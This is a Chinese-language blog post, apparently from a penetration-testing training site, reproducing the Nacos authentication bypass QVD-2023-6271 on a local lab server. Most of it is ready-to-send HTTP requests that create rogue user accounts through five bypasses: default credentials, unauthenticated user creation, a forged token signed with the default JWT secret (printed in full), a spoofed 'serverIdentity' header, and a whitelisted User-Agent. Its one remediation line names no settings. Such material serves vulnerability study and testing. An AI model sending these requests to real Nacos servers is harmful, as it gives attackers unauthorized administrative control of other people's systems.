QVD-2023-6271:Nacos身份认证绕过漏洞
【推荐学习】暗月渗透测试培训 十多年渗透经验,体系化培训渗透测试 、高效学习渗透测试,欢迎添加微信好友aptimeok 咨询。
Nacos
在默认配置下未对token.secret.key
进行修改,导致远程攻击者可以绕过密钥认证进入后台,造成系统受控等后果。
1. 下载nacos:
https://github.com/alibaba/nacos/releases/tag/2.2.0
这里选择官方打包好的jar包下载
http://192.168.xx.xx:8848/nacos/index.html

方式一:默认账号

方式二:默认未授权
POST /nacos/v1/auth/users HTTP/1.1
Host: 192.168.31.112:8848
Content-Type: application/x-www-form-urlencoded
Content-Length: 31
username=test02&password=test02

方式三:默认JWT-secret

POST /nacos/v1/auth/users?accessToken=eyJhbGciOiJIUzI1NiJ9.eyJzdWIiOiJuYWNvcyIsImV4cCI6MTY3OTA4NTg3NX0.WT8N_acMlow8KTHusMacfvr84W4osgSdtyHu9p49tvc HTTP/1.1
Host: 192.168.31.112:8848
Content-Type: application/x-www-form-urlencoded
Content-Length: 31
username=test03&password=test03

方式四:默认头部
POST /nacos/v1/auth/users HTTP/1.1
Host: 192.168.31.112:8848
Content-Type: application/x-www-form-urlencoded
serverIdentity: security
Content-Length: 31
username=test05&password=test05

方式五:低版本(nacos<1.4.1)默认白名单UA
nacos.core.auth.enable.userAgentAuthWhite=true开启白名单UA

POST /nacos/v1/auth/users HTTP/1.1
Host: 192.168.31.112:8848
User-Agent: Nacos-Server
Content-Type: application/x-www-form-urlencoded
Content-Length: 31
username=test04&password=test04

2.删除默认配置中的下列选项,启动nacos时必须手动配置

原创文章,作者:mOon,如若转载,请注明出处:https://www.moonsec.com/8326.html